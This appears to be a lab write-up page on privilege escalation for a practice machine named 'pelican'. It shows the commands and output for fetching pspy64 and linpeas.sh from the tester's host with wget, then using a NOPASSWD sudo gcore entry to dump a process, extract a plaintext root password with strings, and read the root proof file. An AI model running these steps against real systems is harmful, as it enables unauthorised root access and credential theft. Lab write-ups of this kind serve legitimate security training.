Priv Esc

charles@pelican:~$ sudo -l
sudo -l
Matching Defaults entries for charles on pelican:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User charles may run the following commands on pelican:
    (ALL) NOPASSWD: /usr/bin/gcore

gcore | GTFOBinsgtfobins.github.io

$ cat /etc/crontab

$ python -m http.server 80

Obtain a second shell

charles@pelican:/dev/shm$ wget 192.168.45.233/pspy64
wget 192.168.45.233/pspy64
--2024-08-30 21:20:37--  http://192.168.45.233/pspy64
Connecting to 192.168.45.233:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3104768 (3.0M) [application/octet-stream]
Saving to: ‘pspy64’

pspy64              100%[===================>]   2.96M  2.67MB/s    in 1.1s    

2024-08-30 21:20:38 (2.67 MB/s) - ‘pspy64’ saved [3104768/3104768]

charles@pelican:~$ wget 192.168.45.233/linpeas.sh
--2024-08-30 21:24:32--  http://192.168.45.233/linpeas.sh
Connecting to 192.168.45.233:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 860335 (840K) [text/x-sh]
Saving to: ‘linpeas.sh’

linpeas.sh          100%[===================>] 840.17K  1.80MB/s    in 0.5s    

2024-08-30 21:24:32 (1.80 MB/s) - ‘linpeas.sh’ saved [860335/860335]

charles@pelican:~$ chmod +x linpeas.sh 
charles@pelican:~$ ./linpeas.sh

Totally know what to do now

Getting passwords of logged in users | Sentnlwiki.sentnl.io

charles@pelican:~$ sudo /usr/bin/gcore 10960
0x00007f27e77736f4 in __GI___nanosleep (requested_time=requested_time@entry=0x7ffe69bbda30, remaining=remaining@entry=0x7ffe69bbda30) at ../sysdeps/unix/sysv/linux/nanosleep.c:28
28	../sysdeps/unix/sysv/linux/nanosleep.c: No such file or directory.
Saved corefile core.10960
[Inferior 1 (process 10960) detached]

charles@pelican:~$ strings core.10960

ClogKingpinInning731

charles@pelican:~$ su root
Password: 
root@pelican:/home/charles# whoami
root
root@pelican:/home/charles# cat /root/proof.txt 
b7f3b04ee25ad19e999a553bfca65b68
root@pelican:/home/charles# ip addr
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
3: ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 00:50:56:bf:86:28 brd ff:ff:ff:ff:ff:ff
    inet 192.168.229.98/24 brd 192.168.229.255 scope global noprefixroute ens192
       valid_lft forever preferred_lft forever
root@pelican:/home/charles#

PreviousEnumeration NextCredentials / Notes / LL

Last updated 1 year ago